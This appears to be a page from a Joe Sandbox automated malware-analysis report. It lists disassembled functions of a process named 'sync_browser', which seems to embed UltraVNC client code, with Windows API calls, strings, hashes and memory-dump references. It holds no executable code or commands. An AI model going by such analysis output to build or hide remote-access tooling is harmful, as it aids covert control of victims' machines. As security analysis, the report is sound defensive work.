Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: free$Object$Delete$MessageSend$FreeLibrarySingleWait
String ID: vncclient.cpp : deleting socket$vncclient.cpp : ~vncClient() executing...
API String ID: 2172171234-2418058073
Opcode ID: fd6e93333f79ed3293ab94359e9080bfa85a2ad45a32625ec314112d417f8769
Instruction ID: aed95be0aab1dc070338c152b48ff658a38b6578661c62f7093e6a7dfdaad646
Opcode Fuzzy Hash: fd6e93333f79ed3293ab94359e9080bfa85a2ad45a32625ec314112d417f8769
Instruction Fuzzy Hash: 9E813832A0AA8186EB54EF65D8943BDA364FF84F98FD80132DE1D4B695CF39A455C330

Function 00007FF7D5982FF0 Relevance: 27.2, APIs: 18, Instructions: 183
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF7D59E7978: malloc.LIBCMT ref: 00007FF7D59E7992

std::exception::exception.LIBCMT ref: 00007FF7D598303E
GetWindowLongPtrA.USER32 ref: 00007FF7D59830A7
GetDlgItem.USER32 ref: 00007FF7D59830F5
SendMessageA.USER32 ref: 00007FF7D598310C
SendMessageA.USER32 ref: 00007FF7D5983127
EndDialog.USER32 ref: 00007FF7D5983268

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: MessageSend$DialogItemLongWindowmallocstd::exception::exception
String ID:
API String ID: 1935883720-0
Opcode ID: 7be5ccecca7b2e798f0e3ae60729954586f2e76e6c9a6f26eb5410dab4250f23
Instruction ID: f8a13b101384c3d9770d94c755e72048eae9ac29c41f040f026727b94de81010
Opcode Fuzzy Hash: 7be5ccecca7b2e798f0e3ae60729954586f2e76e6c9a6f26eb5410dab4250f23
Instruction Fuzzy Hash: 2E618F61A18A5283EB14AB29E85477EA7A1EF89FD4FD08132DE4D47B98DF3CD445C310

Function 00007FF7D59C75C0 Relevance: 25.7, APIs: 17, Instructions: 151
threadmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

EnterCriticalSection.KERNEL32 ref: 00007FF7D59C75D9
ReleaseSemaphore.KERNEL32 ref: 00007FF7D59C7625
GetLastError.KERNEL32 ref: 00007FF7D59C764E
LeaveCriticalSection.KERNEL32 ref: 00007FF7D59C7659
TlsAlloc.KERNEL32 ref: 00007FF7D59C76A4
GetLastError.KERNEL32 ref: 00007FF7D59C76B5
InitializeCriticalSection.KERNEL32 ref: 00007FF7D59C76F0
GetCurrentProcess.KERNEL32 ref: 00007FF7D59C772F
GetCurrentThread.KERNEL32 ref: 00007FF7D59C7738
GetCurrentProcess.KERNEL32 ref: 00007FF7D59C7741
DuplicateHandle.KERNELBASE ref: 00007FF7D59C776C
GetLastError.KERNEL32 ref: 00007FF7D59C7780
GetCurrentThreadId.KERNEL32 ref: 00007FF7D59C779C
TlsSetValue.KERNEL32 ref: 00007FF7D59C77AE
GetLastError.KERNEL32 ref: 00007FF7D59C77B8

Part of subcall function 00007FF7D59F2950: RaiseException.KERNEL32 ref: 00007FF7D59F29CB

SetThreadPriority.KERNELBASE ref: 00007FF7D59C77DA
GetLastError.KERNEL32 ref: 00007FF7D59C77E4

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: ErrorLast$Current$CriticalSectionThread$Process$AllocDuplicateEnterExceptionHandleInitializeLeavePriorityRaiseReleaseSemaphoreValue
String ID:
API String ID: 772457954-0
Opcode ID: 6724cc30325cfb9ab06b351ea06354c6b11979decb25812fb5b84730cc05a7b3
Instruction ID: 3d6e0f441e3d1817f595b027d595ec586ba7f32f0144f9ecc88174ca797d2d35
Opcode Fuzzy Hash: 6724cc30325cfb9ab06b351ea06354c6b11979decb25812fb5b84730cc05a7b3
Instruction Fuzzy Hash: C1615C31A1871687EA44AF25A84467DBBA0FF88F88FD40036EE4D57669DF3CE049C760

Function 00007FF7D594F940 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 183
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

sprintf.LIBCMT ref: 00007FF7D594F9C7
EnterCriticalSection.KERNEL32 ref: 00007FF7D594FA75
LeaveCriticalSection.KERNEL32 ref: 00007FF7D594FA9E
SleepEx.KERNELBASE ref: 00007FF7D594FAF2
swscanf.LIBCMT ref: 00007FF7D594FB87

Strings

false, xrefs: 00007FF7D594FBB7
RFB, xrefs: 00007FF7D594FB56
REP, xrefs: 00007FF7D594FB2F
vncclient.cpp : m_ms_logon set to %s, xrefs: 00007FF7D594FBC4
0.0.0.0, xrefs: 00007FF7D594F999
i, xrefs: 00007FF7D594FA6A
RFB %03d.%03d, xrefs: 00007FF7D594F9BB, 00007FF7D594FB7B
true, xrefs: 00007FF7D594FBB0

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeaveSleepsprintfswscanf
String ID: 0.0.0.0$REP$RFB$RFB %03d.%03d$false$i$true$vncclient.cpp : m_ms_logon set to %s
API String ID: 958158500-3765181313
Opcode ID: 1bbc69bf7bb785b75e95c5cc589f663b48bba7a26dfe6112371c6df2dcd9451f
Instruction ID: 2519423926eb414473290f5f23207abc93e4e61f65611f95e887f48a244636f2
Opcode Fuzzy Hash: 1bbc69bf7bb785b75e95c5cc589f663b48bba7a26dfe6112371c6df2dcd9451f
Instruction Fuzzy Hash: 42919F22608B8286EB649B15E448BADB7A5FB84F88FC40137DE4D43794DF3CD949C714

Function 00007FF7D5999D80 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 75
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF7D5999BC0: LoadLibraryA.KERNEL32 ref: 00007FF7D5999C03
Part of subcall function 00007FF7D5999BC0: GetProcAddress.KERNEL32 ref: 00007FF7D5999C1B
Part of subcall function 00007FF7D5999BC0: GetProcAddress.KERNEL32 ref: 00007FF7D5999C2E
Part of subcall function 00007FF7D5999BC0: GetSystemMetrics.USER32 ref: 00007FF7D5999C4E
Part of subcall function 00007FF7D5999BC0: GetCurrentProcessId.KERNEL32 ref: 00007FF7D5999C61
Part of subcall function 00007FF7D5999BC0: ProcessIdToSessionId.KERNEL32 ref: 00007FF7D5999C76
Part of subcall function 00007FF7D5999BC0: CreateToolhelp32Snapshot.KERNEL32 ref: 00007FF7D5999C85
Part of subcall function 00007FF7D5999BC0: Process32First.KERNEL32 ref: 00007FF7D5999CA4
Part of subcall function 00007FF7D5999BC0: CloseHandle.KERNEL32 ref: 00007FF7D5999CB1
Part of subcall function 00007FF7D5999BC0: FreeLibrary.KERNEL32 ref: 00007FF7D5999CBF

OpenProcess.KERNEL32 ref: 00007FF7D5999DC0
OpenProcessToken.ADVAPI32 ref: 00007FF7D5999DD6
CloseHandle.KERNEL32 ref: 00007FF7D5999EBA

Strings

?, xrefs: 00007FF7D5999E76

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: Process$AddressCloseHandleLibraryOpenProc$CreateCurrentFirstFreeLoadMetricsProcess32SessionSnapshotSystemTokenToolhelp32
String ID: ?
API String ID: 2900023865-1684325040
Opcode ID: febb9543f439330e09f6a3bb3b030836e2934ac63594c7e2729f7f74b439011d
Instruction ID: d001504c746a7ff7f6cc284ad8db7c52505d6d5792dcfc03eb5697988e5c2d9f
Opcode Fuzzy Hash: febb9543f439330e09f6a3bb3b030836e2934ac63594c7e2729f7f74b439011d
Instruction Fuzzy Hash: E6312C3260DB8186E7609B65F44476EB7A8FBC9B84F800036DA8D47B58DF3DD055CB10

Function 00007FF7D59580DA Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 189
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF7D5940270: CreateRectRgn.GDI32 ref: 00007FF7D594029D
Part of subcall function 00007FF7D5940270: CreateRectRgn.GDI32 ref: 00007FF7D59402C1
Part of subcall function 00007FF7D5940270: CreateRectRgn.GDI32 ref: 00007FF7D59402E5

Part of subcall function 00007FF7D59E92A4: malloc.LIBCMT ref: 00007FF7D59E92C7

CreateRectRgn.GDI32 ref: 00007FF7D59581F8
LoadLibraryA.KERNEL32 ref: 00007FF7D5958235
GetProcAddress.KERNEL32 ref: 00007FF7D5958251

Strings

vncclient.cpp : TEST 4, xrefs: 00007FF7D59582DF
SendInput, xrefs: 00007FF7D5958247
USER32, xrefs: 00007FF7D595822E
vncclient.cpp : vncClient() executing..., xrefs: 00007FF7D5958277

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: CreateRect$AddressLibraryLoadProcmalloc
String ID: SendInput$USER32$vncclient.cpp : TEST 4$vncclient.cpp : vncClient() executing...
API String ID: 1369618222-3178290357
Opcode ID: 59c5cb1e7166b4b1d70f07f65a41a2d60febf100e89283cd68553da4dcc8056f
Instruction ID: 0094b7708f6f1a47fcf9e5d3af4dc676c9fe56d2f5b3920498c582b2686934e8
Opcode Fuzzy Hash: 59c5cb1e7166b4b1d70f07f65a41a2d60febf100e89283cd68553da4dcc8056f
Instruction Fuzzy Hash: BFB14A32625BE196E348CF24EA443DDBBA8F744B44F94422AE7A807B91CF796076C750

Function 00007FF7D59C7B50 Relevance: 10.6, APIs: 7, Instructions: 81
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

EnterCriticalSection.KERNEL32 ref: 00007FF7D59C7B61
GetLastError.KERNEL32 ref: 00007FF7D59C7BC9
SetThreadPriority.KERNELBASE ref: 00007FF7D59C7C1D
GetLastError.KERNEL32 ref: 00007FF7D59C7C27
ResumeThread.KERNELBASE ref: 00007FF7D59C7C47
GetLastError.KERNEL32 ref: 00007FF7D59C7C52
LeaveCriticalSection.KERNEL32 ref: 00007FF7D59C7C79

Part of subcall function 00007FF7D59F2950: RaiseException.KERNEL32 ref: 00007FF7D59F29CB

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: ErrorLast$CriticalSectionThread$EnterExceptionLeavePriorityRaiseResume
String ID:
API String ID: 1366308849-0
Opcode ID: 63ef2765017d1710e1b3fde4549e7b5a362e36a6304331ef8a9692e50ded8925
Instruction ID: 2c102bcbaf7b0ee45c0186c445c4eeb59445ac45d8e4ec3f80fdfe074e6b080d
Opcode Fuzzy Hash: 63ef2765017d1710e1b3fde4549e7b5a362e36a6304331ef8a9692e50ded8925
Instruction Fuzzy Hash: DE313A26A0865387EB14AF64E4445BDB7A1FF85B58FD0013BEA4D43AA9DF3CD449CB20

Function 00007FF7D599CF90 Relevance: 9.1, APIs: 6, Instructions: 110
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

setsockopt.WS2_32 ref: 00007FF7D599CFDC
setsockopt.WS2_32 ref: 00007FF7D599D013
WSAIoctl.WS2_32 ref: 00007FF7D599D07E
getsockname.WS2_32 ref: 00007FF7D599D0AF
getpeername.WS2_32 ref: 00007FF7D599D0DE
SetPerTcpConnectionEStats.IPHLPAPI ref: 00007FF7D599D128

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: setsockopt$ConnectionIoctlStatsgetpeernamegetsockname
String ID:
API String ID: 2120259006-0
Opcode ID: c49f95ef961e3e379a6d047de3f2c4db0e5666ab8321b85981a4bd72149005e7
Instruction ID: 908624c5de7b9e9abd4e1c7e2f9cf3ac379a515399f290170e077263e754ad23
Opcode Fuzzy Hash: c49f95ef961e3e379a6d047de3f2c4db0e5666ab8321b85981a4bd72149005e7
Instruction Fuzzy Hash: F8512672604B81DFE724DF34D4846ADB7A4FB8870CF804526EB5C87A48DB78D6A5CB60

Function 00007FF7D59F285C Relevance: 9.1, APIs: 6, Instructions: 63
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_errno.LIBCMT ref: 00007FF7D59F2887
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7D59F2892
_getptd.LIBCMT ref: 00007FF7D59F28B8
CreateThread.KERNELBASE ref: 00007FF7D59F290D
GetLastError.KERNEL32 ref: 00007FF7D59F2918
free.LIBCMT ref: 00007FF7D59F2923

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: CreateErrorLastThread_errno_getptd_invalid_parameter_noinfofree
String ID:
API String ID: 3283625137-0
Opcode ID: d7d1bbc1acb5388812442ca131e75b053374a14ef8d2c0d32f7c34c2cb7a35d3
Instruction ID: 598a0f8867108aef951f2836ab747d6f0fa6bd07c18c56e9d2a3cac99a456a88
Opcode Fuzzy Hash: d7d1bbc1acb5388812442ca131e75b053374a14ef8d2c0d32f7c34c2cb7a35d3
Instruction Fuzzy Hash: 4A219221A0878187EA14BB65A9412BDF2A4BF84F94FD44136EE5D037D6CF3CE4518710

Function 00007FF7D5943FB0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 81
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetComputerNameA.KERNEL32 ref: 00007FF7D594409C
LoadLibraryA.KERNELBASE ref: 00007FF7D59440D7

Strings

RICHED32.DLL, xrefs: 00007FF7D59440D0
Unable to load the Rich Edit (RICHED32.DLL) control!, xrefs: 00007FF7D59440F1
Rich Edit Dll Loading, xrefs: 00007FF7D59440EA

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: ComputerLibraryLoadName
String ID: RICHED32.DLL$Rich Edit Dll Loading$Unable to load the Rich Edit (RICHED32.DLL) control!
API String ID: 2278097360-3189507618
Opcode ID: a0e48cd9bca1a580f90c0fe309f8f060cfac1904e258431fe3c2638ac3c22389
Instruction ID: d8d3fd6d82d751c09d83a60ac676e72dba4883785599fa26bd85998bd9dc33af
Opcode Fuzzy Hash: a0e48cd9bca1a580f90c0fe309f8f060cfac1904e258431fe3c2638ac3c22389
Instruction Fuzzy Hash: 32319C21B19B4282EB98EB2AF85432D6B91EF85F48F80403ADA4D473E5EF3DD454C760

Function 00007FF7D599A320 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindWindowExA.USER32 ref: 00007FF7D599A34F
GetWindowThreadProcessId.USER32 ref: 00007FF7D599A36A
GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF7D599AB1F,?,?,?,00007FF7D5957FB2), ref: 00007FF7D599A370
PostMessageA.USER32 ref: 00007FF7D599A387

Strings

WinVNC Tray Icon, xrefs: 00007FF7D599A340

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: ProcessWindow$CurrentFindMessagePostThread
String ID: WinVNC Tray Icon
API String ID: 2660421340-1071638575
Opcode ID: 559e961aba49f3495be4a1de55413b2cc06c1e4dbc84eeda83157a0626d0a607
Instruction ID: 91b8d35177c11c43ea739fdfbe17a3b2ef5144ca0a9a4a2c61d44096958a2ef6
Opcode Fuzzy Hash: 559e961aba49f3495be4a1de55413b2cc06c1e4dbc84eeda83157a0626d0a607
Instruction Fuzzy Hash: F2018F21608B8186E708AB66B8448AAFA64FF88FD4FD45036DE4903B68DE3CD885C710

Function 00007FF7D59533A0 Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 85COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF7D59533D3

Strings

vncclient.cpp : failed to set socket timeout(%d), xrefs: 00007FF7D59533D9
vncclient.cpp : A connection using DSM already exist - client rejected to avoid crash , xrefs: 00007FF7D5953490
vncclient.cpp : DSMPlugin Pointer to socket OK, xrefs: 00007FF7D5953429
vncclient.cpp : Invalid DSMPlugin Pointer, xrefs: 00007FF7D5953502

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
